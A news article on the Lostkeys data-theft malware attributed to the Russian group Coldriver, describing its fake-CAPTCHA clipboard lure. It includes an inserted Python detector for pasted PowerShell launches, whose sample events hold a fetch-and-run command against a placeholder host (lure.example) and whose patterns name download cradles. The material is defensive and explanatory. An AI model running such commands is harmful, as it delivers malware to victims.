
New ‘Lostkeys’ Malware Tied to Russian Cyber Group


The Google Threat Intelligence Group (GTIG) recently released a report detailing a newly identified malware strain named Lostkeys. This data theft malware is suspected to be associated with the Russian threat group known as Coldriver. The malicious software poses a significant risk, as it is distributed through a multi-step process that begins with lure websites designed to entice victims.

New Malware Linked to Russian Threat Group Coldriver Identified

In a blog post, Google disclosed that Lostkeys was first detected in January, with further sightings noted in both March and April. This malware appears to be an addition to Coldriver’s arsenal, which is also known by aliases such as UNC4057, Star Blizzard, and Callisto.

The Coldriver group has gained notoriety for executing credential phishing attacks targeting various organizations, including NATO governments, non-governmental organizations (NGOs), military institutions, journalists, and diplomatic personnel. Their activities have previously been linked to the Spica malware in 2024.

The group’s tactics involve a more sophisticated approach than standard phishing operations. Initially, they send out deceptive emails that impersonate credible institutions, which include links to lure websites. These websites often feature false CAPTCHA prompts designed to mislead victims into believing they are legitimate. When users complete the CAPTCHA, malicious PowerShell code is copied to their clipboard.

PowerShell is a built-in command-line shell and scripting language extensively used for administrative tasks, automation, and configuration management within Windows environments. Its inherent capabilities often make it a tool of choice for cybercriminals to download and execute malware directly in memory.

After the PowerShell code has been copied to the clipboard, victims are instructed to paste and execute it via the Windows “Run” dialog. This action initiates a second phase that calculates the MD5 hash of the device’s display resolution. Typically, this is followed by a third phase that seeks to avoid execution in virtual machines if the earlier hash-based detection is unsuccessful.
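The delivery chain described above (lure page, fake CAPTCHA, clipboard, Run dialog) leaves a recognisable footprint in endpoint telemetry: PowerShell started interactively from the shell with arguments an administrator rarely types by hand. The following is an added example, not code from Google’s report or from the original article, showing how a defender might score Sysmon-style process-creation records for that pattern. The event records, field names, the dummy base64 string and the lure.example hostname are all constructed sample data, not indicators from the report.

```python
"""Heuristic detector for clipboard-pasted PowerShell launches (ClickFix-style).

All events below are constructed samples; none are real telemetry or IoCs.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal view of a process-creation record (Sysmon Event ID 1 style)."""
    parent_image: str
    image: str
    command_line: str


# Command-line traits typical of pasted lure commands: hidden window,
# execution-policy bypass, encoded command body, in-memory download cradle.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"-(w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
    (re.compile(r"-(e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(iwr|iex|invoke-webrequest|invoke-expression|downloadstring|net\.webclient)\b", re.I),
     "download/execute cradle"),
]


def is_powershell(image: str) -> bool:
    return image.lower().endswith(("powershell.exe", "pwsh.exe"))


def launched_from_shell(parent_image: str) -> bool:
    # The Run dialog and Start menu launch children under explorer.exe.
    return parent_image.lower().endswith("explorer.exe")


def score_event(ev: ProcessEvent) -> list[str]:
    """Return the list of suspicious traits found on a single event."""
    findings: list[str] = []
    if not is_powershell(ev.image):
        return findings
    if launched_from_shell(ev.parent_image):
        findings.append("interactive launch from explorer.exe")
    for pattern, label in SUSPICIOUS_PATTERNS:
        if pattern.search(ev.command_line):
            findings.append(label)
    return findings


def detect(events: list[ProcessEvent], min_findings: int = 2) -> list[tuple[ProcessEvent, list[str]]]:
    """Alert on events that accumulate at least `min_findings` traits.

    A single trait (e.g. a user simply opening PowerShell) is normal; the
    combination of shell launch plus hidden/encoded/cradle arguments is not.
    """
    alerts = []
    for ev in events:
        findings = score_event(ev)
        if len(findings) >= min_findings:
            alerts.append((ev, findings))
    return alerts


# Constructed sample events (hostname and base64 body are placeholders).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -w hidden -ep bypass -c "iwr http://lure.example/stage2 | iex"'),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -File C:\scripts\nightly-backup.ps1"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Program Files\PowerShell\7\pwsh.exe",
                 "pwsh.exe -NoP -w hidden -EncodedCommand AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"),
]

if __name__ == "__main__":
    for ev, findings in detect(SAMPLE_EVENTS):
        print(f"ALERT parent={ev.parent_image} findings={findings}")
        print(f"      cmd={ev.command_line}")
```

The threshold of two traits keeps a plain interactive PowerShell session (sample three) and a scheduled script started from cmd.exe (sample two) below the alert line, while the two pasted-style commands are flagged; in a real deployment the parent-process check would be extended to cover other launchers and the hit fed to a SIEM rather than printed.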

Following these steps, further code execution retrieves and decodes the malware’s final payload, which is a Visual Basic Script (VBS) file known as Lostkeys. According to GTIG, this malware is capable of “stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker.”

Google notes that Coldriver generally utilizes malware to extract emails and contacts from their targets; however, they are also known to leverage malware such as Spica to gain access to documents stored on affected systems. Lostkeys serves a similar purpose.

In response to these threats, Google has incorporated all identified malicious websites, domains, and files into the Safe Browsing feature of Google Chrome to safeguard users from potential exploitation. Moreover, the tech company is dispatching alerts to targeted Gmail and Workspace users regarding state-sponsored attacks, encouraging them to enable Enhanced Safe Browsing for added protection.
